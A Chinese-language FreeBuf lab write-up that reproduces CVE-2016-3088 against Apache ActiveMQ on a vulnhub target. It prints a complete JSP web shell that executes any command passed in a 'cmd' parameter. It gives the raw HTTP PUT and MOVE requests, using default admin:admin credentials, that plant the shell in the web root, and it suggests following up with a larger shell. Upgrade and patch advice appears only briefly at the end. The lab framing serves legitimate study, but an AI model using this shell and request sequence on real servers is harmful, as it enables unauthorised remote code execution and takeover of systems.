freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulnhub2-activeMQ(CVE-2016-3088)
木樨 2023-01-17 00:32:40 126182
所属地 甘肃省

1、靶场介绍

ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件;由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。

2、漏洞编号

CVE-2016-3088

  1. 漏洞编号:CVE-2016-3088

  2. 影响版本:Apache ActiveMQ 5.x~5.14.0

3、漏洞复现

3.1 靶场搭建

具体步奏请参考。。。。


查看具体版本

http://192.168.2.20:8161/admin/index.jsp?printable=trueadmin:admin

1673886462_63c57afe5b13b604c2b56.png!small?1673886455093

漏洞利用

查看绝对路径

1673886478_63c57b0ecfd980469663b.png!small?1673886471687

生成后门:上传小马。

<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>

上传jsp

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.2.20:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=1rlsob5mrxi5g173n8hr9gh7v7
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2621

<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>

1673886496_63c57b20d432af9d41a0d.png!small?1673886489649

修改报文头添加

MOVE /fileserver/1.txt
Destination:file:///opt/activemq/webapps/api/5.jsp
MOVE /fileserver/1.txt HTTP/1.1
Destination:file:///opt/activemq/webapps/api/5.jsp
Host: 192.168.2.20:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=1rlsob5mrxi5g173n8hr9gh7v7
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 2621

<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>

1673886510_63c57b2ebeaac049d4a92.png!small?1673886503525

访问如下路径查找后门文件。

http://192.168.2.20:8161/api/

1673886542_63c57b4ec9e03403b8e37.png!small?1673886535618

尝试连接。

1673886557_63c57b5d2d921366fb818.png!small?1673886549875

上传完小马可以上传大马。

修复建议

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

3、打补丁

http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 木樨 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
木樨 LV.4
这家伙太懒了,还未填写个人描述!
  • 11 文章数
  • 3 关注者
CMS Made Simple v2.2.15-RCE
2023-02-06
ED01-CMS v20180505
2023-02-06
春秋云境界---CVE-2022-28512
2023-02-05